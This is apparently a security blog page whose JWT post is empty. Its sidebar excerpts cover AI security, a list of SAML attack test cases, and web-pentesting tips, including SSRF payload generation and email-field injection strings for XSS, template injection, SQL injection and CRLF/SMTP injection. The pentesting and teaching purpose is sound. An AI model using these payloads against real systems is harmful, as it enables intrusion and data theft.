JWT security test cases

 


Comments

Post a Comment

Popular posts from this blog

Image
Securing AI: Safeguarding the Future of Intelligent Systems Featured Image: Unsplash Artificial Intelligence (AI) is revolutionizing industries, from healthcare to finance, by enabling automation, personalization, and data-driven decision-making. However, as AI systems grow more pervasive, their security vulnerabilities are becoming a critical concern. 📊 Quick Stat : By 2025, 30% of enterprises will prioritize AI-specific security tools to combat adversarial attacks ( Gartner ). Why AI Security Matters Source: Getty Images AI systems are not just code; they’re dynamic entities trained on vast datasets. Their security is critical because: High Stakes : AI powers autonomous vehicles, medical diagnostics, and critical inf...
Read more

SAML Security Test Cases

Signature Exclusion Attack -Test whether or not the SP accepts an Assertion without a Signature  Signature Spoofing attack -Test whether SP accepts fake signature or using previously generated/invalid signature Signature Wrapping Attack (8 Different Ways)-Test whether or not the SP is susceptible to Signature Wrapping XML Injection -Test if can inject malicious code into the SAML response from IDP, allowing them to execute arbitrary code on the SP server. XML Entity Expansion (XEE)/XXE -Test whether or not the SP is vulnerable to XML External Entities Replay attacks -Test if previously generated SAML response from IDP can be accepted by SP Certificate Faking/Self signed certificate -Test whether or not the SP verifies that the Assertion came from a trusted IDP/Test if SP accepts self-signed certificate XSLT Injection -Test whether or not the SP is vulnerable to XSLT Predictable signature -Test whether IDP generating guessable signature SAML message expiration -Test whether SP acc...
Read more

Useful Tips and Tricks for Web Pentesting

Generating Custom SSRF Payloads https://tools.intigriti.io/redirector/# How to do it 1. Go to Intigriti payload generator → https://tools.intigriti.io/redirector/# 2. Enter the target domain (it can be anything) 3. Enter your own collaborator URL 4. Submit 5. Download the .txt file and use it as part of intruder This will generate an SSRF payload list that: • Contains your collaborator URL • Applies encoding on your collaborator URL to bypass filters   Injecting Payloads in Email Address Fields test+(<script>alert(0)</script>)@example.com test@example(<script>alert(0)</script>).com "<script>alert(0)</script>"@example.com "<%=7*7%>"@example.com test+(${{7*7}})@example.com "'OR1=1--'"@example.com user@test.burpcollaborator.net user@[127.0.0.1] user@email=attacker@example.com %0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com "recipient@test.com\r\nRCPT TO:<victim+"@test.com For...
Read more